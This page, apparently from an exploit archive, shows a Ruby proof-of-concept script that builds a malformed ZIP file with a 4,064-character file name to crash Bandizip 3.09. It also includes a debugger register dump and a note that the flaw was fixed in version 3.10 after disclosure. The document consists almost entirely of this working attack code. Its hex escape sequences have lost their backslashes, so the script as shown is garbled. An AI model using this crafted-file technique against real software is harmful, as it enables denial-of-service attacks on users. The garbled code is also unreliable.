Home / exploits Bandizip 3.09 Crash Proof Of Concept
Posted on 11 February 2014
#!/usr/bin/env ruby # Exploit Title: Bandizip 3.09 .zip Crash POC # Date: February 6th 2014 # Author: Osanda Malith Jayathissa # E-Mail: osandajayathissa<at>gmail.com # Version: 3.09 32bit and 64bit (Below versions might be affected) # Vendor Homepage: http://www.bandisoft.com/ # Tested on: Windows XP 32-bit SP2 en, Windows 8 64-bit # This issue is patched in Bandizip 3.10 after a responsible disclosure # Open this crafted file and double click on it in the app it self =begin eax=00000000 ebx=0374fad0 ecx=00000000 edx=00000000 esi=0374fa54 edi=00000000 eip=770be1a4 esp=0374f92c ebp=0374faac iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 ntdll!ZwWaitForMultipleObjects+0xc: 770be1a4 c21400 ret 14h =end # Ensure we have valid ZIP Header lf_header = "x50x4Bx03x04x14x00x00" lf_header += "x00x00x00xB7xACxCEx34x00x00x00" lf_header += "x00x00x00x00x00x00x00x00" lf_header += "xe4x0f" #file size lf_header += "x00x00x00" cdf_header = "x50x4Bx01x02x14x00x14" cdf_header += "x00x00x00x00x00xB7xACxCEx34x00x00x00" cdf_header += "x00x00x00x00x00x00x00x00x00" cdf_header += "xe4x0f" # file size cdf_header += "x00x00x00x00x00x00x01x00" cdf_header += "x24x00x00x00x00x00x00x00" eofcdf_header = "x50x4Bx05x06x00x00x00x00x01x00x01x00" eofcdf_header += "x12x10x00x00" # Size of central directory (bytes) eofcdf_header += "x02x10x00x00" # Offset of start of central directory,relative to start of archive eofcdf_header += "x00x00" # Our Payload payload = "A" * 4064 payload += ".txt" Exploit = lf_header + payload + cdf_header + payload + eofcdf_header f=File.open('bandizip.zip', 'w') f.write(Exploit) f.close #EOF
